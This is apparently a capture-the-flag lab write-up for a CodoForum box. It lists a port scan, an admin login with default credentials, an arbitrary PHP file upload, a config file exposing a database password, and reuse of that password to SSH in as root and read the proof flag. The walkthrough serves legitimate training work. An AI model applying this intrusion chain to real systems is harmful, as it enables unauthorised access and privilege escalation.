EASY-Codo
Target:
192.168.121.23
Information gathering:
./rustscan -a 192.168.121.23 --scripts none -r 1-65535



Cat flag:
http://192.168.121.23/index.php?u=/ (admin/admin)
http://192.168.121.23/admin/index.php (admin/admin)

http://192.168.121.23/sites/default/assets/img/attachments/Snipaste_2025-05-11_18-03-40.php
Perform an arbitrary file upload

/admin/index.php?page=config

Obtain the account credentials:
<?php
/*
 * @CODOLICENSE
 */
defined('IN_CODOF') or die();

$CF_installed=true;

function get_codo_db_conf() {
    $config = array (
        'driver' => 'mysql',
        'host' => 'localhost',
        'database' => 'codoforumdb',
        'username' => 'codo',
        'password' => 'FatPanda123',
        'prefix' => '',
        'charset' => 'utf8',
        'collation' => 'utf8_unicode_ci',
    );
    return $config;
}

$DB = get_codo_db_conf();

$CONF = array (
    'driver' => 'Custom',
    'UID' => '631042af544ef',
    'SECRET' => '631042af544f0',
    'PREFIX' => ''
);
Use the password collected from the configuration file to log in as the root account:

ssh root@192.168.121.23
root@codo:~# ls
email2.txt  proof.txt  snap
root@codo:~# cat proof.txt
50b4bf66f9976304bc4c502e58527900
root@codo:~# cd /
root@codo:/# find / -name "local.txt"
root@codo:/#

